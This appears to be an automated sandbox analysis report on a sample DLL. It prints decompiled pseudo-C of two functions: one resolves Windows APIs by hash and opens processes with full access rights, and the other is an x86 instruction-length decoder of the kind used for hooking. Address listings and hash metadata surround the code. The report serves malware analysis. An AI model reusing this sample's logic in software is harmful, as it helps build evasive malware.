								E6F50CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6F50F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6F50F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6F50F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6F50F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6F50F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6F5138F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6F50F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6F50F828( *(_t449 + 4), E6F50F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6F50F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6F50F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6F50F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6F50F4BC(_t322, _t430);
										E6F5138F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6F50F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6F50F828(_t322, E6F50F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6F50F828( *(_t449 + 4), E6F50F4CC( *_t449) + 4);
								 *(E6F50F4BC( *(_t449 + 4), E6F50F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6F50F828(_t322, E6F50F4CC(_t322) + 4);
								 *(E6F50F4BC(_t322, E6F50F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6F50F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6F513064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6F50F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6F50F828( *(_t449 + 4), E6F50F4CC( *_t449) + 4);
										 *(E6F50F4BC( *(_t449 + 4), E6F50F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6F50F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6F50F828( *((intOrPtr*)(_t449 + 0x74)), E6F50F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6F50F4BC( *((intOrPtr*)(_t449 + 0x74)), E6F50F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6F50F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6F50F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6F50F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6F50F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6F50F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6F50F4BC(_t430, _t443);
										E6F5138F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6F50F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6F50F828(_t430, E6F50F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6F513064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6F50F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6F50F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6F50F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6F50F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6F50F4BC( *(_t449 + 4), _t445);
										E6F5138F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6F50F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6F50F828( *(_t449 + 4), E6F50F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6F50F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6f508435
0x6f50843b
0x6f50843f
0x6f508443
0x6f50844e
0x6f508452
0x6f508457
0x6f50845f
0x6f50846f
0x00000000
0x6f508471
0x6f508479
0x6f508480
0x6f508480
0x6f5089d3
0x6f5089d5
0x6f508a16
0x6f508a18
0x6f508a27
0x6f508a33
0x6f508a33
0x6f508a22
0x6f508a39
0x6f508a3e
0x00000000
0x6f508a3e
0x6f508a26
0x00000000
0x6f50848a
0x6f50848e
0x6f508491
0x6f508599
0x6f508599
0x6f50859e
0x6f5086c1
0x6f5086c5
0x6f5086ca
0x6f5086ce
0x6f5086d2
0x6f508808
0x6f50880a
0x6f50880e
0x6f508817
0x6f508822
0x6f508826
0x6f50882f
0x6f508834
0x6f50883a
0x6f50883b
0x6f50883f
0x6f508843
0x6f50884a
0x6f50884c
0x6f50898c
0x6f50899d
0x6f5089a4
0x6f5089ab
0x6f5089ab
0x6f5089ae
0x6f5089b1
0x6f5089b4
0x6f5089ba
0x6f5089c1
0x6f5089c5
0x6f5089ce
0x00000000
0x6f5089ce
0x6f5089bc
0x6f5089bf
0x6f5089d8
0x6f5089f0
0x6f5089f3
0x6f5089f8
0x6f508a02
0x6f508a05
0x6f508a08
0x6f508a11
0x00000000
0x6f508a11
0x00000000
0x6f5089bf
0x6f508854
0x6f508854
0x6f508856
0x6f50885a
0x6f50885f
0x6f508861
0x6f508865
0x6f508868
0x6f508870
0x6f508872
0x00000000
0x00000000
0x6f508889
0x6f5088a4
0x6f5088a6
0x6f5088b4
0x6f5088b9
0x6f5088bb
0x6f5088d8
0x6f5088d8
0x6f5088dc
0x6f5088de
0x00000000
0x00000000
0x6f5088e0
0x6f5088e3
0x6f508904
0x6f508923
0x6f508929
0x6f50892c
0x6f508931
0x6f508932
0x6f508939
0x00000000
0x00000000
0x6f508941
0x6f508941
0x6f508943
0x6f50894f
0x6f50895b
0x6f50897d
0x6f508982
0x6f508983
0x6f508983
0x00000000
0x6f508943
0x00000000
0x6f5088e3
0x6f5088bd
0x6f5088c3
0x6f5088c5
0x6f5088c6
0x6f5088c7
0x6f5088c8
0x6f5088cc
0x6f5088d0
0x6f5088d2
0x6f5088d3
0x6f5088d4
0x6f5088d6
0x00000000
0x00000000
0x00000000
0x6f5088d6
0x6f5088e9
0x00000000
0x6f5088e9
0x6f5086d8
0x6f5086da
0x6f5086dc
0x00000000
0x00000000
0x6f5086e6
0x6f5086e6
0x6f5086e8
0x6f5086eb
0x6f5086ed
0x6f5086f5
0x6f5086fc
0x6f508700
0x6f508703
0x00000000
0x00000000
0x6f5087ff
0x6f508800
0x6f508802
0x00000000
0x00000000
0x00000000
0x6f508802
0x6f508709
0x6f50870c
0x6f508715
0x6f50871a
0x6f50871c
0x6f508728
0x6f50872c
0x6f508731
0x6f508735
0x6f508b12
0x6f508b26
0x6f508b48
0x6f508b4d
0x6f508b4d
0x6f50874b
0x6f508750
0x6f508754
0x6f508754
0x6f508754
0x6f508754
0x6f508759
0x6f50875e
0x6f508760
0x6f508764
0x6f50876b
0x6f508770
0x6f508772
0x6f508ad3
0x6f508ae2
0x6f508afb
0x6f508b00
0x6f508b00
0x6f508785
0x6f50878a
0x6f50878e
0x6f50878e
0x6f50878e
0x6f5087a0
0x6f5087c1
0x6f5087c9
0x6f5087d7
0x6f5087f5
0x6f5087fb
0x6f5087fb
0x00000000
0x6f50870c
0x6f5085a4
0x6f5085a4
0x6f5085a6
0x6f5085ad
0x6f5085bb
0x6f5085bd
0x6f5085c1
0x6f5085c3
0x6f5085c5
0x6f508600
0x6f50860f
0x6f508611
0x6f508613
0x6f508631
0x6f508633
0x6f508635
0x6f508647
0x6f508665
0x6f50866e
0x6f508671
0x6f50867f
0x6f508690
0x6f5086ae
0x6f5086b0
0x6f5086b4
0x6f5086b4
0x6f5086b4
0x6f508635
0x00000000
0x6f508613
0x6f5085cb
0x6f5085cb
0x6f5085d0
0x6f5085d7
0x6f5085e6
0x6f5085ed
0x6f5085ef
0x00000000
0x00000000
0x6f5085fb
0x6f5085fc
0x6f5085fe
0x00000000
0x00000000
0x00000000
0x6f5085fe
0x6f5085f1
0x6f5085f4
0x00000000
0x00000000
0x6f5086b6
0x6f5086b6
0x6f5086b7
0x6f5086b7
0x00000000
0x6f508497
0x6f508497
0x6f508497
0x6f508499
0x6f5084a0
0x6f5084ae
0x6f5084b0
0x6f5084b4
0x6f5084b6
0x6f5084e2
0x6f5084e6
0x6f5084eb
0x6f5084f0
0x6f5084f4
0x6f5084f8
0x6f5084ff
0x6f508504
0x6f508506
0x6f508a95
0x6f508aa4
0x6f508ac3
0x6f508ac8
0x6f508ac8
0x6f508519
0x6f50851e
0x6f508522
0x6f508522
0x6f508522
0x6f508533
0x6f508535
0x6f508537
0x6f508548
0x6f508548
0x6f50854d
0x6f508552
0x6f508556
0x6f50855b
0x6f508562
0x6f508567
0x6f508569
0x6f508a57
0x6f508a63
0x6f508a7d
0x6f508a82
0x6f508a82
0x6f50857f
0x6f508584
0x6f508588
0x6f508588
0x6f508588
0x6f508588
0x6f50858b
0x6f50858b
0x00000000
0x6f50858b
0x6f5084ba
0x6f5084ba
0x6f5084bc
0x6f5084c8
0x6f5084cf
0x6f5084d1
0x00000000
0x00000000
0x6f5084dd
0x6f5084de
0x6f5084e0
0x00000000
0x00000000
0x00000000
0x6f5084e0
0x6f5084d3
0x6f5084d6
0x00000000
0x00000000
0x6f50858c
0x6f508590
0x6f508591
0x6f508591
0x00000000
0x6f508499
0x6f508491

Strings

, xrefs: 6F508A1A

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: 5a63991e6a0c6f63f01c7449f881b38b6fcb5c36c591951ad0867137d042d1c6
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: C41247716087059FC754FF24C990A6EB7E5EFC5718F004A3DEA99872A1EB30AC05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6F519370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F519370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6F513698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6f519377
0x6f51937b
0x6f519387
0x6f51938b
0x6f51938f
0x6f519394
0x6f519397
0x6f519399
0x6f51939b
0x6f51939b
0x6f51939e
0x6f5193a4
0x6f51941c
0x6f519420
0x6f519423
0x6f519423
0x6f519426
0x00000000
0x6f519426
0x6f5193ab
0x6f519413
0x6f519417
0x00000000
0x6f519417
0x6f5193b2
0x6f51940b
0x6f51940e
0x00000000
0x6f51940e
0x6f5193b7
0x6f5193f5
0x6f5193fc
0x6f5193ff
0x6f5193c8
0x6f5193c8
0x6f5193ce
0x00000000
0x00000000
0x6f5193d3
0x6f5193ed
0x6f5193f0
0x00000000
0x6f5193f0
0x6f5193d8
0x00000000
0x6f5193da
0x6f5193de
0x6f5193e1
0x00000000
0x6f5193e1
0x6f5193d8
0x6f519429
0x6f519429
0x6f519429
0x6f519432
0x6f51943b
0x6f51943e
0x6f519441
0x6f519444
0x6f519447
0x6f51944d
0x6f51948f
0x6f519492
0x6f519493
0x6f51949a
0x6f51949d
0x6f51944f
0x6f519453
0x6f51945d
0x6f519464
0x6f519466
0x6f51947f
0x6f519482
0x6f519482
0x6f519464
0x6f5194a5
0x6f5194a8
0x6f5194ab
0x6f5194af
0x6f5194b3
0x6f5194bd
0x6f5194c1
0x6f5194cb
0x6f5194d4
0x6f5194e1
